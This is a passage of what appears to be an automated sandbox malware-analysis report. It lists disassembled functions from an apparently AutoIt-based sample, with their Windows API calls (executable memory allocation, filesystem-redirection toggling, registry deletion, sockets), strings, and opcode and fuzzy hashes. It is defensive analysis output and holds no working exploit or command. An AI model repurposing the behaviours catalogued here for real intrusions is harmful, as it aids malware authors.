                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: %lu
                                                                        • API String ID: 2507767853-685833217
                                                                        • Opcode ID: 13751327417a293044b8d180ee7dbe986e772c7e532feb8ffd29e95432694166
                                                                        • Instruction ID: 6e4f1025f7b8b77afd0860c4fc3ab512bc12de6058014029df095d63310d4180
                                                                        • Opcode Fuzzy Hash: 13751327417a293044b8d180ee7dbe986e772c7e532feb8ffd29e95432694166
                                                                        • Instruction Fuzzy Hash: 11217170A0010DAFCB10EF69C985DEE7BB8FF89314B044069F909EB251DA31EA41DB22
                                                                        Function 008EF973 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • _wprintf.LIBCMT ref: 008EFA17
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$^ ERROR
                                                                        • API String ID: 346992586-1644414935
                                                                        • Opcode ID: 5eb527562e98e9691b94c4ecf8243c6bbf64aa8d231d68cf4a23e28179aad567
                                                                        • Instruction ID: 7fb8527a1b24281163c6daf0fd6555d450a8f4df4d57542a3b336641e2d052c7
                                                                        • Opcode Fuzzy Hash: 5eb527562e98e9691b94c4ecf8243c6bbf64aa8d231d68cf4a23e28179aad567
                                                                        • Instruction Fuzzy Hash: F121FA3281410D9ACF09FBA8DD92DFEB774FF15315F640165E516B20A2AF212F19CB62
                                                                        Function 0091770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00917772
                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00917787
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00917794
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: 10f5c3c9aca5ff8b130b618a6b867ae3e8d7f721f774fb1329ebdc45f842661f
                                                                        • Instruction ID: 37a0da62a72e118a4359617a2e69241a34d956935d5be26c6dc04e4d8102c2b2
                                                                        • Opcode Fuzzy Hash: 10f5c3c9aca5ff8b130b618a6b867ae3e8d7f721f774fb1329ebdc45f842661f
                                                                        • Instruction Fuzzy Hash: A011C172254209BAEF209FA5CC05FEB77ADEF88B64F114528FA45A60D0D672E851DB20
                                                                        Function 00894C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00894BD0,?,00894DEF,?,009552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00894C11
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00894C23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: b0c7ddb3200a3f0f07b2176e01eea4bb3d9862b23f2476b88a41e7de7d11b282
                                                                        • Instruction ID: c8dc1579119f156d2017a9929d19f40196a252635ed74e65ddf2e79defed7325
                                                                        • Opcode Fuzzy Hash: b0c7ddb3200a3f0f07b2176e01eea4bb3d9862b23f2476b88a41e7de7d11b282
                                                                        • Instruction Fuzzy Hash: C5D0C230618717DFCB206F70D828A46B6D5FF08346B05CC39A486C2150E6B0C480CA10
                                                                        Function 00894C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00894B83), ref: 00894C44
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00894C56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: e97484f225c736769862b7505c239f6063c272d14dec0c657bcdaf8727b3788a
                                                                        • Instruction ID: fa8bb1d0ea0574527089ac84d9454eb58e4069e199e0db4a787316a67d072192
                                                                        • Opcode Fuzzy Hash: e97484f225c736769862b7505c239f6063c272d14dec0c657bcdaf8727b3788a
                                                                        • Instruction Fuzzy Hash: DAD0C73062CB17DFCB20AF31D818A8A72E4FF01348B15C83AA49AC6260E670C880CA10
                                                                        Function 00910DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0090FD01), ref: 00910DF5
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00910E07
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: 7981a5755cab24e6fa46c13e824e06ff1aa119d0463ffa06373ae94ac569ab5d
                                                                        • Instruction ID: a261e709d0c59c869153e8bdbdf9a60a7bcb13a5f2b6105100ccb073def714d8
                                                                        • Opcode Fuzzy Hash: 7981a5755cab24e6fa46c13e824e06ff1aa119d0463ffa06373ae94ac569ab5d
                                                                        • Instruction Fuzzy Hash: 87D0177072472ADFD7209F76C808AC77AE9AF84356F21CC3EA886D2150E6B1D8D0CA50
                                                                        Function 009090E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00908CF4,?,0091F910), ref: 009090EE
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00909100
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: 0304aaf5381e3652564f1bced5bb6dceaff42033340e4c152eda7d9e06642f88
                                                                        • Instruction ID: c3f07660307344ecf2055934deb6ccec58212a77a7ac0b8637d2afe74c163fed
                                                                        • Opcode Fuzzy Hash: 0304aaf5381e3652564f1bced5bb6dceaff42033340e4c152eda7d9e06642f88
                                                                        • Instruction Fuzzy Hash: 19D0173476C717DFDB209F31D82868676E8AF45355B12C83AD48AD6591EAB4C880DA90
                                                                        Function 008E717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f58db5e32dc85395341987444b32f58742f5736f19a9db7fb460b71996aef53
                                                                        • Instruction ID: 3e26d7673c01462bce7177eaa92a77cad21cfe9f8330771e6604217ff0c4a95b
                                                                        • Opcode Fuzzy Hash: 6f58db5e32dc85395341987444b32f58742f5736f19a9db7fb460b71996aef53
                                                                        • Instruction Fuzzy Hash: 3BC18174A0425AEFDB14CF95C884EAEBBB5FF49304B148598E805EB351D730ED41DB90
                                                                        Function 0090E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0090E0BE
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0090E101
                                                                          • Part of subcall function 0090D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0090D7C5
                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0090E301
                                                                        • _memmove.LIBCMT ref: 0090E314
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                        • String ID:
                                                                        • API String ID: 3659485706-0
                                                                        • Opcode ID: 4b8698efe61f3eb900545004f33306f0445e2b018a4b179367255595c7df4895
                                                                        • Instruction ID: 2bb677106463d2ab387c5550bcc5a8b278487371600aa42659855000f44f4765
                                                                        • Opcode Fuzzy Hash: 4b8698efe61f3eb900545004f33306f0445e2b018a4b179367255595c7df4895
                                                                        • Instruction Fuzzy Hash: ADC136716083019FC714DF28C490A6ABBE4FF89714F18896EF899DB391D731E946CB82
                                                                        Function 00908093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 009080C3
                                                                        • CoUninitialize.OLE32 ref: 009080CE
                                                                          • Part of subcall function 008ED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008ED5D4
                                                                        • VariantInit.OLEAUT32(?), ref: 009080D9
                                                                        • VariantClear.OLEAUT32(?), ref: 009083AA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: bb5bb57169a795a49196ef9e64d25833ce749bb9b637371385cd816a86459767
                                                                        • Instruction ID: 9f7ddf2add1496a75803c43e9df923fa0d5837bc6320726ebb99b63068871a25
                                                                        • Opcode Fuzzy Hash: bb5bb57169a795a49196ef9e64d25833ce749bb9b637371385cd816a86459767
                                                                        • Instruction Fuzzy Hash: 0BA115756047019FCB10EF58C881A2AB7E8FF89764F18445CF99AAB3A1DB34ED05CB42
                                                                        Function 008E7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00922C7C,?), ref: 008E76EA
                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00922C7C,?), ref: 008E7702
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0091FB80,000000FF,?,00000000,00000800,00000000,?,00922C7C,?), ref: 008E7727
                                                                        • _memcmp.LIBCMT ref: 008E7748
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                        • String ID:
                                                                        • API String ID: 314563124-0
                                                                        • Opcode ID: a51b9e922bf09418d6bbd9056315397461aa88f873354c6dc4cbfcafcefc4743
                                                                        • Instruction ID: a6b6edd5b8e7580f2a069984d49ac09fa0037be2b3606f6424d5586084a54f78
                                                                        • Opcode Fuzzy Hash: a51b9e922bf09418d6bbd9056315397461aa88f873354c6dc4cbfcafcefc4743
                                                                        • Instruction Fuzzy Hash: FD81FC75A10109EFCB04DFA5C984EEEB7B9FF89315F204598E506EB250DB71AE06CB60
                                                                        Function 008E687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: af5ad401ad6b045bb08d59a6b2183eb68100a63e1054971b1ff0ee572f98d398
                                                                        • Instruction ID: 7576c6e650623fe6a4a4462d03440a9dd8d3a73e926ff613c6ba42eaf7e513b9
                                                                        • Opcode Fuzzy Hash: af5ad401ad6b045bb08d59a6b2183eb68100a63e1054971b1ff0ee572f98d398
                                                                        • Instruction Fuzzy Hash: D051F934B003459EDF20AF6AD89167AB7E5FF26390F24D82FE586D7291FA30D8508702
                                                                        Function 009197F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(014CE318,?), ref: 00919863
                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00919896
                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00919903
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: 49e888b82eaef44180182a2a93cac0114ba584a62b3159edd4c9f0e8f229729e
                                                                        • Instruction ID: 0281b21f284f3eff10528ee6cff3b3907bdaf65b47f9401acf6f83ea9648fe40
                                                                        • Opcode Fuzzy Hash: 49e888b82eaef44180182a2a93cac0114ba584a62b3159edd4c9f0e8f229729e
                                                                        • Instruction Fuzzy Hash: D8513F34A00209AFDF14DF54C894AEE7BB9FF46360F148159F9559B2A0D730AD81DB90
                                                                        Function 008E9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 008E9AD2
                                                                        • __itow.LIBCMT ref: 008E9B03
                                                                          • Part of subcall function 008E9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 008E9DBE
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 008E9B6C
                                                                        • __itow.LIBCMT ref: 008E9BC3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 6fc2024ffc0f5599ac09c147e00a6e7221a7438cc7447df54a480f36f83a2153
                                                                        • Instruction ID: 9741459633babeaf3d71e7a3867e0e2876ea4540c4806a0151fa8fe56cba3482
                                                                        • Opcode Fuzzy Hash: 6fc2024ffc0f5599ac09c147e00a6e7221a7438cc7447df54a480f36f83a2153
                                                                        • Instruction Fuzzy Hash: 5141C070A0025CABDF21EF59D845BEE7BB9FF85724F040029F945E7291DBB09A44CB62
                                                                        Function 009069AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 009069D1
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009069E1
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00906A45
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00906A51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$__itowsocket
                                                                        • String ID:
                                                                        • API String ID: 2099362015-0
                                                                        • Opcode ID: 6f037fa1ac271a8cc6f966dba37262323a0f9c4512fd1b47ce951d588e329253
                                                                        • Instruction ID: 16b25a2961ecaac49469bb450b98d01cdad0c46ce269e2a98847469198c377a1
                                                                        • Opcode Fuzzy Hash: 6f037fa1ac271a8cc6f966dba37262323a0f9c4512fd1b47ce951d588e329253
                                                                        • Instruction Fuzzy Hash: 38415375740200AFDB50BF6CCC86F7A76E8EB15B14F08845CFA59EB2D2DA759D008792
                                                                        Function 008BAE1F Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                                        • String ID:
                                                                        • API String ID: 4182129353-0
                                                                        • Opcode ID: 067c51e6a15dabab23aed4b9a08e48c06f3d1f0e409bb21551ff3cede98f659f
                                                                        • Instruction ID: 655ce587e85a87145177b63da614e00d63b194735d1aaa5b3e5043c6f8e57867
                                                                        • Opcode Fuzzy Hash: 067c51e6a15dabab23aed4b9a08e48c06f3d1f0e409bb21551ff3cede98f659f
                                                                        • Instruction Fuzzy Hash: 1B4190B1500B059FD72C9F2DC896AFA77E4FF45324B14861DE4AAC63D1EB34E8408B52
                                                                        Function 0090641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0091F910), ref: 009064A7
                                                                        • _strlen.LIBCMT ref: 009064D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
